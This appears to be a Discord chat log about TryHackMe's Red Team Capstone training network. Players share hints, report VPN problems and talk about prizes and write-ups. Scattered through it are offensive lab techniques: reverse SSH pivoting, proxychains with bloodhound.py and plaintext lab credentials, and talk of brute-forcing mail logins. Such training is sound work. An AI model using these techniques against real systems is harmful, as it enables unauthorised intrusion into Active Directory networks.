i only have 2 votes, now I need to wait more 3 hours to give 1 vote per hour

You'll need to state your subnet.

They're all different, and you might be asking 5 people to reset their network who don't need it.

And that won't benefit you.

.52 network

since tomorrow is the last day access for individual users, everyone is in a hurry to compromise the network, wish you all the best @drowsy osprey

Thanks for the motivation @iron forge

Gave +1 Rep to @iron forge

Glad you ar liking it!

Lol, you could always just pivot so you don't have to fight for RDP control

Congrats on completing it!

Congrats on completing it!! 🎉

You can do it! Believe in you!

Congrats on completing it! 🎉

Thank you very much @trim beacon, I didn't think I woukld be able to because of time constraints, but then I got so close and had a good session today to finish it. Great network! 🙂

Gave +1 Rep to @trim beacon

Thanks for the nice feedback! Glad you could get it done in time!

Gave +1 Rep to @tall imp

I finally managed to get as far as here without any RPDing, but I still have no idea how I would access the website this way... does anyone have any tips?

Host's have SSH right? Why don't you do a reverse dynamic SSH proxy? Open SSH server on your kali, then from the host ssh -R 8081 kali@<your kali tun ip>. Then port 8081 will now be on your kali host ready for proxychaining 🙂

Thank you! I did ssh proxy my way there, what's one more 😁

Gave +1 Rep to @trim beacon

Exactly! And this is a nice reverse one, so a bit of a change for once

Why would anyone delete /etc/passwd file? I'm just getting trolled by someone...Network uptime 1 hour...
sudo: unknown uid 33: who are you?

Can someone reset .52 lab?

Thanks, I will try it again. when I tried a couple of times before, the user under PsExec is corp\administrator. You can’t RDP to root with a CORPDC user.

Gave +1 Rep to @white summit

Rdp to bank dc with the created admin instead

Can anyone help me with this issue, The DNS operation timed out after 3.005955934524536 seconds, on my Kali vm the resolver is inactive.

That is in Bloodhond.py

Thanks dude! Loved it, wish I could do it again

Gave +1 Rep to @trim beacon

add --dns-tcp to your command at the end

assuming you are using proxy chains udp has trouble

Thank you shadow, but I have that already , proxychains ./bloodhound.py -d c10.200.116.11 -u laura.wood -p "Password1@" -c all -ns 10.200.116.11 --dns-tcp

some of output

[proxychains] Strict chain ... 127.0.0.1:9050 ... 10.200.116.102:53 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... 10.200.116.102:53 ... OK

I'm like you @slow garnet , I can use proxychains to nmap, smbclient and reach the dc but I'm unable to launch my bloodhound against it since I'm always receiving timeout.
The resolution lifetime expired after 3.103 seconds: Server 10.200.52.102 TCP port 53 answered The DNS operation timed out. Any hints guys?

proxychains -q ./bloodhound.py -d corp.thereserve.loc -u laura.wood -p "Password1@" -c all -ns 10.200.subnet.102 --dns-tcp
is the exact command shadow used and it worked fine for shadow

Yeah, it doesnt work for me

I can't wait to see the list of winners.

Thank you all, rooted!!

Gave +1 Rep to @white summit

I am having trouble getting the last flag to work. I don't understand, the capturer has no transactions, it just disappeared. Fix. delete flags 18 and 19 and redo them before submitting 20.

Oh wait. I guess the PIN part wasn't needed. Thanks for the lab!

@trim beacon if I can see the Transactions capturer view should I be able to see the dummy transaction or it means I'm getting closer to it?

Should be yes, best to use an incognito tab just to make sure cookies are not screwing with your output that you are seeing

I can immediately see it after changing "something" but no transactions appear. If I change "something else" I simply lose also access to the dashboard data. Am I missing something?

Now my password is wrong, something on your end or should I redo everything?

Nope, you are going to have to figure this one out. SWIFT is isolated, so it is the one system that users cannot tamper with through means such as altering the passwords

If your session token is not correct, you will not be able to see transactions. If you are in a browser, you can use Ctrl + Shift + C to pull up the network debugger. That will show you why transactions are not being loaded with most cases it being that your token is not valid. To fix that, you need to authenticate. Again, I suggest an incognito browser so old tokens don't screw you over

ok, how can I remove the flag 17?

I got it sorry

A SWIFT reset should do the trick for you

Thanks @trim beacon

Gave +1 Rep to @trim beacon

Use DNSchef hak5 video on proxychains dnschef and bloodhound

https://www.youtube.com/watch?v=4ydjpSSKQ8g

Thanks @white summit but after all it was not necessary.

Gave +1 Rep to @white summit

All rooted! Thanks @trim beacon for the challenge, please release more of this in the future!

Gave +1 Rep to @trim beacon

@trim beacon hi, can u help me, I'm done mistake at want to submit flag 20, im already approved wrong transactions, bcs i not see my id transactions i just approved wrong id transactions, after that i just noticed my transactions is not yet submit PIN, I think after submit the pin then my id transactions in approver account, how can i reset this process?

u need to reset swift process ; i.e and redo from flag 17 @civic mountain

login to ssh --> then 2 [ authenticate ] --> then reset the swift process [ 3 ]

u good to go then

thx bro, i'll try

Gave +1 Rep to @granite valve

when's the top writeups comming out ? ; eager to know new techniques.

Soon™️

cool !

Timer is ticking down, thanks again @trim beacon for this amazing network, happy to have had the opportunity to try it out!

Gave +1 Rep to @trim beacon

Can this be claimed by the person who has paid the wp? But I don't seem to see the coupon

You'll get it E-mailed to you.

All winners will be contacted via E-mail if you've won.

okay, thank。

I took a medium hoodie, don't even know if it would fit

Where will the reports of the winners be published? i really want to read them

On the blog soon™️

I have submited a write up, but don't receive an email?

All will be sent, no worries - emails are in progress 🙂

Okay thank you

Gave +1 Rep to @hidden galleon

My mini report was… 7 pages. Admittedly I didn’t fledge it out as well as I could have and didn’t find many exploits. If I had business access I’d go back and see how many other paths I can find

Just out of pure curiosity, could we see the final stats?

• 1000+ room joins (don't know actual total since we kick users each week)
• 805 profiles registered on e-citizen
• 317 users submitted at least one flag
• 3922 flags submitted in total
• 160 room completions

Overall a bit higher on completion rate that I initially thought we would achieve but still awesome!

Awesome indeed! Everyone tried hard

Yeah 160 completions is quite a lot. It was a fantastic network though so I am not too surprised. Thanks again am03bam4n for making it!

Really enjoyed doing this, so much better than a typical ctf! Learned so much in a short amount of time. Huge thanks to @trim beacon and the rest of THM for putting it all together!

Gave +1 Rep to @trim beacon

Thanks you for the feedback!

Gave +1 Rep to @fervent sail

Indeed! Time to get building on the next challenge! 😉

Thank you for the feedback!

Can't wait, whatever you come up with will be great

A Red Team Capstone type challenge with a nice SIEM to thwart off attackers? 😁

Are we allowed to post write-ups/walkthroughs on our blog? As far as I get, things won't be the same on the B2B side

Yeah, some automated blue teaming there to kick out the baddies!

I think that will be fine, since we are rotating all flag values. But perhaps since it is a winning writeup maybe coincide your release with the THM blog post?

Of course, no problem, I have to take the time to polish things more anyway as I tried to explore other paths

Sounds good! We are just finalising everything for the shift and then the blog posts are next on the todo list

Awesome, looking forward to reading some write-ups and learning even more

what about the e-citizen hints??? do you not need to finish that first????

Can we use this channel to share the writeups and/or notes to each other? I have fully documented GitHub repo for it. I'd also like to see alternative exploitation methods from other players.

haha I'll see how I feel and then maybe slowly add hints. But with the blog post releases that at least gives some hints as well!

Again, happy with this, my ask is just that we wait slightly for the blog posts to go out first, then can share discussions here as well

Thanks

Gave +1 Rep to @trim beacon

Maybe you send the email to the wrong email address, but I've already not received an email 😆

I'll follow up 😄 We're using emails attached to your thm account

So should all emails already be sent out? Because if yes, I also did not receive an email yet :D

We're on it!

Can you dm me? Just had confirmation we've tried to contact you & got no response until now.

All missing runner-up emails will be done ASAP!

The 2 million thing is keeping the marketing team busy, sorry for the delay 🙏

No problem. The 2 million users thing is important so take the time you need.

Same here - no email, but I figured you all are busy when 2M announcement came out, which congratulations!

Ah, there it is, thank you! 😁

Hello! I have just reached out to all runners-up. Please check your emails 😎

Thank you!

Gave +1 Rep to @tribal condor

I received it, too. Thank you.

Gave +1 Rep to @tribal condor

Also received it, thanks a ton!

Thank you!!! 😊

Gave +1 Rep to @tribal condor

Thank you again. Does everbody get the same?

Gave +1 Rep to @tribal condor

Yes, every runner-up will receive the same 😎

Hi yo. Just wana ask. We will not be able to access this network anymore right? Its now only for business subscription?

Yes, it will show you that if you try to access it

Alrighty. Thank you. Great thing i had it completed prior. 😀

Damn i missed this room 😭

same

Any thoughts on making this room open for all again ?

the cost is to high... they made it open for everyone for as long as they could

Oooh ok, thank you for the info

Gave +1 Rep to @cerulean wraith

no problem

am03bam4n has stated that he would like to make the badge acuireable again later down the line if possible

Wow nice to hear

First writeup is up: https://tryhackme.com/resources/blog/azkraths-red-team-capstone-write-up

Congrats again @viral yew ! 🎉 🎉 🎉 🎉

Oh man, looking at this write up (which was well done) I can see where I went wrong. Good job I still have access to the room

wait whaaaa

I'll DM you?

nah rather not step into that minefield.....

Lol, it's legit

yeah okay then send a dm if you want

gonna be on and off a bit anyways

send a dm if you want then... shadow just got spooked that you somehow got access and therefor breaking thm rules

Oh sweet the first report, glad to check these out and improve my own reports by learning from them.

Ik @quaint knot has set up a 'business group' where put put £40 a month in (£400 a year) and they get a business plan as a group of 5. I would be tempted if I had the money so thats probably how hes got access still.

Looks like the second place report is up on the blog, nice

Incorrect.

Fair enough, thought it were a potential Avenue

I did set up a business group for Hack Smarter -- my brand for streaming and teaching -- but it's full. I'm hoping to show off some of the business features in upcoming streams 🙂

How can i subscribe to capstone?

you can't really do this anymore unless you have a business account

Thank you i don't have account business

Gave +1 Rep to @cerulean wraith

How can you do the capstone project? Been apart of THM for a month now

oh sorry to tell you that you are to late as the event for this network ended... the only way to do it nowadays is if you have a business account with tryhackme

Gotcha. That sucks. 😦 I wanted something like that so really test my skills

Wreath, Holo and Throwback are networks, not like this one was, but it's still networks.

✅

@red yarrow

Is there any report made in

How someone was able to compromise AD just by getting onto their network

Meaning got the AD control and did all AD enumeration without being an AD user

Is this for homework?

Yes

We don't help with homework

Bro homework meaning I am doing this for my company
Ethically

You should ask your supervisor or line manager for help then, not out source it to discord?

I thought the red team capstone challenge was meant only for enterprise customers, and never went back to actually check it.

was browsing through the library today and I don't believe what I saw, so just asking for confirmation here, is the red team capstone challenge accessible to VIP users?

If its there, its there

But cc @lyric stream or @red yarrow for awareness.

@lyric stream @red yarrow - Am I seeing the right thing here? 😅

Yes it is. 🙂

@hollow yoke

@lyric stream just one more question, do you plan on keeping it available for the VIP users or that might change in the upcoming future.

👋 Sorry didnt notice I had alerts muted

Oh its alright!

Heya all, I posted in room help too but thought maybe you all might have a thought also....I'm doing the data exfiltration room, on task7 (ICMP efil) but cannot get the data to the listener in metasploit...any idea what I might be doing wrong? https://tryhackme.com/room/dataxexfilt

Is it still available for vip users ?

Yes 😄

I guess I need to subscribe first to be able to see it

Yeah, maybe.

Thank link is on this chanel.

it is still not on the main learning page but if you search for it on the learning search page it shows up

I'm sure it is.

Nah, not there, I found it somewhere else.

yeah that is basically what shadow was saying

it is not on that list but it is in the searchable rooms list

Is there now.

Hello, is there an admin to whom I can write in DM? I may have a problem with the e-Citizen portal

Hello I just have 2 questions is this the same challenge that was launched earlier and how long will this lab be available for premium users ??

What's up?

Not admin, but I may be able to help

Can i DM pls?

Sure

Yes

Hello!
I'm not sure if your question has been answered already by the wonderful @pseudo parrot, but yes, this is the challenge that we released a year ago. We only had this open to individuals for one month, and then switched over to B2B users only.
However, it's now back for premium users (and back for good! 😉)

Thank you so much 😊👍🏻

???? it was not when shadow checked.....

Was added today RE E-mail.

aah

MailAddr: X@corp.th3reserve.loc
IP Range: 10.200.X.0/24

These details are now active. As you can see, we have already purchased a domain for domain squatting to be used for phishing.
Once you discover the webmail server, you can use these details to authenticate and recover additional project information from your mailbox.
Once you have performed actions to compromise the network, please authenticate to e-Citizen in order to provide an update to the government. If your update is sufficient, you will be awarded a flag to indicate progress.

“How can i access this email. I have already breached the perimeter but am am not able to access webmail “

using thunderbird or another email client and loggin in and having the /etc/hosts file setup correctly

I was using the AttackBox and it crashed. I tried reseting my progress and leaving the room. It still says my THM username is registered. Is there anyway to reset this or reset the password.

@trim beacon can you see the above^?

Will authenticate not work?

Or did you not write down the credential details?

We do not have a mechanism to reset password. This would require an out of band system to ensure secure resets which isn't available.

There is a warning that you need to make sure to save your credentials since they won't be displayed again.

However, you do have the option to create a new account and use that. So an account different than your username in THM, which will be fine

Can anyone share stmp and imap setting for corp.th3reserve.loc

I didn't write down the details. I saved them on the attack box. Not thinking lol.

Hi @pseudo parrot what do you want me to send a screenshot of ?

What you're having an issue with 🙂

So I am trying to regester as said in the information but I don't get connected

You don't need to hide your ip, infact, it will be better if you show it 🙂

oks

It is the same subnet the machines are in right ?

What's your IP here?

it is 10.200.17.13

Yeah. right ip.

Can you ping it?

10.200.17.250 ?

sooo I should be able to connect right ?

No I am unable to ping any of the machines

you should be able to yeah

So it is a VPN issue ?

250 is the VPN server.

@trim beacon

sorry for the ping, can you help out?

ah oks

soo what shall I do or check I am a bit confused

I've pinged one of the best people who maybe able to help.

Thank you

Gave +1 Rep to @pseudo parrot (current: #2 - 1929)

You are trying to connect to the wrong IP? If you have 10.200.103 in your diagram, your connection should be to 10.200.103.250, not 10.200.17.250?

Ah I see that was @pseudo parrot's IP

^

Yeah, they're having the issue 😄

Are you on the attackbox or your own machine? If you can't ping it, it means your VPN is not connected. You need to check out why your VPN is not connecting. So if attackbox, there are certain steps there, if your own machine, check what's happening there when you run the VPN file

Hi, is anyone experiencing problems with the internal ovpn? Mine keeps doing a soft,connection-reset. (changed the IP already 😉 )

I’m trying to connect with my own machine, but any suggestion how I can check what’s wrong with the VPN file?

Would suggest starting to provide the output to us here so we can see what is happening? But also reading the output will help?

Will do, having some WiFi issues so might send it in the morning if it doesn’t work

Thank you 😊

This is a little bit of a thing for you to figure out. You can read up a bit on why this can happen, but also maybe think about (and play around with) how your THM VPN works and what policy a company might have in place to prevent larger compromises if a VPN profile is leaked

This was a neat part!

I'm confused how this works... I have initial creds and logon (I would say "breaching permiter", and possibly "breaching AD" are both done)... but I haven't seen a flag to input yet

am I not as far as I think?

Check your E-mails.

huh

When you signed up to the E-citizen portal, it created an E-mail address for you.

Log in to it.

oh okay yeah I need to log in to the web mail.. I see now in the brief

let me just fuzz the endpoint and I'll get right on that lmao

there is no emails other than scope of engagement @pseudo parrot ..

Maybe you should read the entire brief. Including the portion on how you get flags

I am going to provide this information again and then pin it. The last point, about reading and understanding the project brief, is incredibly important. The room simulates a red team engagement. The most important part of such a real-world engagement, it understanding the actual "rules of engagement". This is the thin line that makes your actions as a red teamer legal. Not following this, you are not a red teamer, but a malicious hacker. Please read the instructions before you just start.

Most Important to Remember to Conquer this Capstone Challenge

1. This is a practice exercise for Red Teaming, not a Capture the Flag game. Your CTF skills alone will not be sufficient to complete the challenge.

2. The exercise tests the skills you learned in the Red Teaming Learning Path. We recommend completing at least 80% of this path before attempting the challenge. If you get stuck, go back to the path, as it covers the techniques you need.

3. There are different ways to complete this exercise. If you have trouble with a specific attack, try different approaches and avenues.

4. Carefully read Task 2 "Project Brief", as it contains crucial information you will need to complete the challenge.

Thank you for the reply

Gave +1 Rep to @trim beacon (current: #28 - 269)

Hi, I can' log into the vpn website with the SMTP creds, not sure if that's intended or a bug?

Hi 👋, anyone know how to tackle this error” FATAL ERROR: No supported authentication methods available (server sent: publickey,keyboard-interactive)”

While pscp attempt

Check the domain of your credentials. They aren't valid credentials for your target. You have to breach the perimeter yourself

Please provide more verbose information in order for members here to provide with assistance or potential hints

Hi, I am providing you with the OVPN output as you asked.

You can see the mismatch in the network information you provided us (10.200.17.13) and the route being pushed:
net_route_v4_add: 10.200.116.0/24 via 10.50.113.1 dev [NULL] table 0 metric 1000

My suggestion would be that you regenerate your VPN profile

I have already done that 2-3 times but the result ends up to be the same !

Not sure what to tell you. You can see that your VPN profile does not match the network IPs you provided us. My only other suggestion would be to leave the room and then rejoin. Regen your VPN profile then again and connect. Make sure there is a match between the route being pushed and what you see in your network diagram. If these two don't match, you won't have luck. If that does not work I can refer it to the support team to see what is happening. But have never experienced a VPN server generating a profile different than the network you have joined.

Let me try it out again and will let you know how it goes

Also, if the issue persists, I will need an actual image of your network diagram together with the VPN profile file that was pushed to raise it to support.

Shall I DM those to you ?

hey I remember I faced this issue before too and had sent you the details in the DM can you check your DM's

you had solved it with another file that time

I appreciate the reply yesterday. I did change more than just the ip and tested different user combinations. The push_reply gave me invalid ip's two days ago. The network restarted, it gave me valid internal ip's (but I wasnt connected to the internal). And today it's back to giving me these invalid ip's: PUSH: Received control message: 'PUSH_REPLY,route 10.2001.21 255.255.255.255,route 10.2001.22 255.255.255.255 If this is intentional, I apologise for taking up your time

I can't see the message in my DMs? Not sure what is happening there?

Will just DM you again

No stress with asking questions! It is part of what you need to figure out there yourself. Again, routes might have updated after there was a legacy VPN profile left there. So what can you do here

pscp laura.wood@10.200.7.21:/users/laura.wood/Downloads/20240206214108_BloodHound.zip ~/Documents

I know, but the credentials I got (using bf) aren't working for the VPN website, and are working for the webmail platform

I wonder what they were used for 👀

and I'm not talking about the creds given by the ssh server, I'm using bruteforced credentials

I know what Creds you're talking about

aren't they supposed to be used to connect to the vpn platform?

Can you tell me the username you brute-forced?

there's laura.wood and mohammad.ahmed

Yeah.

Those looks like a they're set up for something.

😉 Keep looking

https://tenor.com/view/random-tuesday-phishing-phish-scam-alert-cyber-security-gif-22993437

Leaving the room and joining again solved it for me

Do some research on what this error message means: "No supported authentication methods available (server sent: publickey,keyboard-interactive)"

Review the syntax of how you are providing the username and password. Remember different authentication methods needs different syntax

Folks, help me out here.
What is the difference between room https://tryhackme.com/room/redteamcapstonechallenge and ~~https://tryhackme.com/room/redteamcapstonechallengerX ~~? The network diagram is clearly not working on the second one...